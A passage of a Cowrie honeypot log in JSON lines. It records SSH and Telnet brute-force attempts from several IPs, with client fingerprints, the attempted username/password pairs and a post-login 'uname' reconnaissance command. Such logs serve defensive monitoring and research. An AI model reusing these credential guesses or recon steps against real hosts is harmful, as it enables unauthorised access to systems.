cm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T17:52:08.628122Z","src_ip":"199.195.253.95","session":"8f1a58bfe502"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:52:09.365528Z","src_ip":"199.195.253.95","session":"8f1a58bfe502"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:52:09.538338Z","src_ip":"199.195.253.95","session":"ecab798e6a4a"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:52:09.539428Z","src_ip":"199.195.253.95","session":"8f1a58bfe502"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46348,"dst_ip":"1.2.3.4","dst_port":22,"session":"00dc955acd41","protocol":"ssh","message":"New connection: 212.227.125.160:46348 (1.2.3.4:22) [session: 00dc955acd41]","sensor":"my-vps","timestamp":"2025-08-28T17:52:24.753357Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T17:52:24.754367Z","src_ip":"212.227.125.160","session":"00dc955acd41"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T17:52:26.666444Z","src_ip":"212.227.125.160","session":"00dc955acd41"}
{"eventid":"cowrie.login.failed","username":"admin","password":"0l0ctyQh243O63uD","message":"login attempt [admin/0l0ctyQh243O63uD] failed","sensor":"my-vps","timestamp":"2025-08-28T17:52:33.167371Z","src_ip":"212.227.125.160","session":"00dc955acd41"}
{"eventid":"cowrie.session.closed","duration":"10.5","message":"Connection lost after 10.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:52:35.270805Z","src_ip":"212.227.125.160","session":"00dc955acd41"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41880,"dst_ip":"1.2.3.4","dst_port":22,"session":"3714031d1d17","protocol":"ssh","message":"New connection: 212.227.125.160:41880 (1.2.3.4:22) [session: 3714031d1d17]","sensor":"my-vps","timestamp":"2025-08-28T17:53:03.847237Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T17:53:03.982965Z","src_ip":"212.227.125.160","session":"3714031d1d17"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T17:53:05.805251Z","src_ip":"212.227.125.160","session":"3714031d1d17"}
{"eventid":"cowrie.login.failed","username":"admin","password":"password","message":"login attempt [admin/password] failed","sensor":"my-vps","timestamp":"2025-08-28T17:53:07.325714Z","src_ip":"212.227.125.160","session":"3714031d1d17"}
{"eventid":"cowrie.session.closed","duration":"4.8","message":"Connection lost after 4.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:53:08.612209Z","src_ip":"212.227.125.160","session":"3714031d1d17"}
{"eventid":"cowrie.session.connect","src_ip":"111.22.75.225","src_port":37769,"dst_ip":"1.2.3.4","dst_port":23,"session":"2428d2b4bbff","protocol":"telnet","message":"New connection: 111.22.75.225:37769 (1.2.3.4:23) [session: 2428d2b4bbff]","sensor":"my-vps","timestamp":"2025-08-28T17:53:09.254071Z"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.253.95","src_port":56924,"dst_ip":"1.2.3.4","dst_port":22,"session":"95641e444512","protocol":"ssh","message":"New connection: 199.195.253.95:56924 (1.2.3.4:22) [session: 95641e444512]","sensor":"my-vps","timestamp":"2025-08-28T17:53:12.652020Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T17:53:12.661115Z","src_ip":"199.195.253.95","session":"95641e444512"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T17:53:12.846540Z","src_ip":"199.195.253.95","session":"95641e444512"}
{"eventid":"cowrie.login.failed","username":"apache","password":"apache123","message":"login attempt [apache/apache123] failed","sensor":"my-vps","timestamp":"2025-08-28T17:53:13.684779Z","src_ip":"199.195.253.95","session":"95641e444512"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44466,"dst_ip":"1.2.3.4","dst_port":22,"session":"134f74adbf54","protocol":"ssh","message":"New connection: 212.227.125.160:44466 (1.2.3.4:22) [session: 134f74adbf54]","sensor":"my-vps","timestamp":"2025-08-28T17:53:14.658823Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T17:53:14.659768Z","src_ip":"212.227.125.160","session":"134f74adbf54"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T17:53:14.708996Z","src_ip":"212.227.125.160","session":"134f74adbf54"}
{"eventid":"cowrie.login.success","username":"root","password":"!QAZ\"WSX\u00a3EDC","message":"login attempt [root/!QAZ\"WSX\u00a3EDC] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:53:14.858799Z","src_ip":"212.227.125.160","session":"134f74adbf54"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:53:14.958580Z","src_ip":"199.195.253.95","session":"95641e444512"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T17:53:14.975785Z","src_ip":"212.227.125.160","session":"134f74adbf54"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T17:53:14.976512Z","src_ip":"212.227.125.160","session":"134f74adbf54"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:53:15.027299Z","src_ip":"212.227.125.160","session":"134f74adbf54"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:53:15.028215Z","src_ip":"212.227.125.160","session":"134f74adbf54"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54680,"dst_ip":"1.2.3.4","dst_port":22,"session":"b55f0f80fdb0","protocol":"ssh","message":"New connection: 212.227.125.160:54680 (1.2.3.4:22) [session: b55f0f80fdb0]","sensor":"my-vps","timestamp":"2025-08-28T17:53:33.931972Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T17:53:34.462712Z","src_ip":"212.227.125.160","session":"b55f0f80fdb0"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T17:53:35.345147Z","src_ip":"212.227.125.160","session":"b55f0f80fdb0"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1234","message":"login attempt [admin/1234] failed","sensor":"my-vps","timestamp":"2025-08-28T17:53:37.548345Z","src_ip":"212.227.125.160","session":"b55f0f80fdb0"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:53:38.892010Z","src_ip":"212.227.125.160","session":"b55f0f80fdb0"}
{"eventid":"cowrie.session.closed","duration":30.971056699752808,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:53:40.225055Z","src_ip":"111.22.75.225","session":"2428d2b4bbff"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.150.220","src_port":47076,"dst_ip":"1.2.3.4","dst_port":22,"session":"4346b8753035","protocol":"ssh","message":"New connection: 171.243.150.220:47076 (1.2.3.4:22) [session: 4346b8753035]","sensor":"my-vps","timestamp":"2025-08-28T17:53:42.973940Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T17:53:42.974918Z","src_ip":"171.243.150.220","session":"4346b8753035"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T17:53:43.187862Z","src_ip":"171.243.150.220","session":"4346b8753035"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1234","message":"login attempt [admin/1234] failed","sensor":"my-vps","timestamp":"2025-08-28T17:53:45.706295Z","src_ip":"171.243.150.220","session":"4346b8753035"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:53:46.952082Z","src_ip":"171.243.150.220","session":"4346b8753035"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52310,"dst_ip":"1.2.3.4","dst_port":22,"session":"4232b9fdcbfb","protocol":"ssh","message":"New connection: 212.227.125.160:52310 (1.2.3.4:22) [session: 4232b9fdcbfb]","sensor":"my-vps","timestamp":"2025-08-28T17:53:55.209529Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T17:53:55.794406Z","src_ip":"212.227.125.160","session":"4232b9fdcbfb"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.